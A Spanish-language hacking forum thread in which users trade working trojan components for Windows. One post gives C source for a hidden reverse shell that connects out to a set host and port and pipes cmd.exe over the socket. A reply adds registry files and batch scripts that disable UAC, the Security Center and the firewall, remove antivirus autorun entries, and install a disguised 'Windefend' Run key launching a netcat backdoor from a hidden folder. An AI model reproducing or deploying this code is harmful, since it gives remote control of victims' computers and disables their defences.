Foro de elhacker.net

Bueno, la cosa es que estoy haciendo un troyano en Windows Vista y 7 en C. He estado probando varias formas, pero no me da resultado. La pregunta es...

¿Por qué los troyanos en Windows XP funcionan y en Vista / 7 no?
Supongo que sera por algun cambio en el sistema operativo, pero deberian funcionar, ¿no?
¿Qué cambia para que no funcionen?

http://foro.elhacker.net/analisis_y_diseno_de_malware/porque_algunos_virus_o_troyanos_no_funcionan_en_otros_so-t304457.0.html

Saludos

soy un poco novato en el tema, pero si observador; hace mucho que no toco C pero si puedo decirte algo realmente interesante que me pasó; conseguí con un programilla exo en batch que w7/vista/xp me envíe su shell a través de netcat; y como supongo que sabrás tuve que añadirle entradas al registro para que algunos antivirus no detectaran (vamos que no se iniciara el antivirus) nc, supongo que el fallo que cometes en C pueda estar resuelto en mi batch (ojo no pestañean en w7 ni vista al instalarse; ningun aviso)

Gracias por responder, esto estaba un poco pasado y nada mas tengo el code para Linux. No me vale batch, no es para fastidiar a nadie, solo saber como se hace en mi lenguaje. Mi codigo en C era sencillamente este de aqui:

#include <time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
 
struct sockaddr_in host;
SOCKET sockfd;
 
 
int main (int argc, char *argv [])
{
	ShowWindow (GetForegroundWindow (), SW_HIDE);
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,2),&wsa);
 
	host.sin_addr.s_addr = inet_addr ("127.0.0.1"); // A modificar!
	host.sin_port = htons (31337); //Igualmente!
	host.sin_family = AF_INET;
	memset (host.sin_zero, 0, 8);
 
        if ((sockfd = socket (2, 1, 0)) == -1) return 1;
        while (connect (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr))) Sleep (1);
	PROCESS_INFORMATION info_proc;
	STARTUPINFO start_proc;
	memset(&start_proc,0,sizeof(start_proc));
	start_proc.cb=sizeof(start_proc);
	start_proc.dwFlags=STARTF_USESTDHANDLES;
	start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (HANDLE)sockfd;
	CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc);
 
        closesocket (sockfd);
        return 0;
}
 
 

El caso es que este metodo no va en Windows Vista / 7, asi que...
En el subforo de C tenia el post original, un moment...
http://foro.elhacker.net/programacion_cc/c_help_iquesttroyanos_en_windows_vista_7_iquestque_cambia_sin_resolver-t314490.0.html

Sin embargo, podria mirar tu codigo? Es por si me ilumina, pues lo tengo en la carpeta de Projects y nada...
Gracias!

compilé tu programa con borland 6 pero en xp sp3 no me funciono mu bien; es probable que sea por un parche de actualizac. de win.

ESTAS SON LAS MODIFICACIONES DE REGISTRO QUE HICE:

//ESTO ES UNA MODIFICACION PARA VISTA/W7 PARA QUE NO APAREZCA CENTRO
DE SEGURIDAD LO LLAMÉ W8.REG

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
"EnableLUA"=dword:00000000

//PROBÉ MI TROYANO CON ALGUNOS ANTIVIRUS Y AÑADÍ ESTA ENTRADA DE REGISTRO
PORQUE AVIRA O AVG DETECTABAN NETCAT COMO VIRUS LO LLAME RUN.REG

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avgnt"=""
"GrooveMonitor"="\"C:\\Program Files\\Microsoft Office\\Office12\\GrooveMonitor.exe\""
"NeroFilterCheck"="C:\\Program Files\\Common Files\\Nero\\Lib\\NeroCheck.exe"
"NBKeyScan"="\"C:\\Program Files\\Nero\\Nero8\\Nero BackItUp\\NBKeyScan.exe\""
"AVG_TRAY"=""
"Windefend"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,49,00,6e,00,74,00,65,00,6c,00,5c,00,6d,00,73,00,30,00,37,\
  00,39,00,2e,00,65,00,78,00,65,00,00,00

ESTE ES EL PRIMER BATCH LO LLAME MS079.BAT

@echo off
REM DESACTIVA CC. Y FIREWALL, DESPUES EJECUTA PHOTOCS Y NETCAT
NET STOP "CENTRO DE SEGURIDAD"
net stop "sharedaccess"
rem TASKKILL /F /IM explorer.exe
explorer.exe
netsh firewall set opmode DISABLE
netsh firewall set opmode mode = DISABLE
cd %systemroot%\Intel
//REM RENOMBRO PARA TENER UN RESPALDO INDETECTABLE
rename resources.ps

SEGUNDO BATCH  

      REM COLOCA ARCHIVOS Y DEJA LISTO PARA EJECUCIÓN
@ECHO OFF
prompt
      rem hacer que se ejecute como administrador
md %systemroot%\Intel
cd %USERPROFILE%\desktop\proyecto
      rem acuerdate de cambiar el nombre
attrib -h *.*          
xcopy *.* %systemroot%\Intel /Y
regedit.exe /s %systemroot%\Intel\W8.reg
regedit.exe /s %systemroot%\Intel\run.reg
attrib +h *.*
ping 192.168.1.1
taskkill /F /IM explorer.exe /y
explorer.exe
exit

NECESITA UNOS ARREGLILLOS, NO ENCUENTRO AHORA EL QUE ESTÁ FINALIZADO;
USÉ EL BATTOEXE PARA HACERLO EJECUTABLE Y OCULTAR LA PANTALLITA NEGRA
Y WINDEFEND ES OTRO EJECUTABLE QUE ABRE NETCAT EN UN PUERTO A UN HOST
-- JOER, VOY A BUSCAR PARA ENCONTRAR TODO EL CODIGO DEL QUE ESTA FINALIZADO si quieres te envio el troyano y lo puedes destripar a tu gusto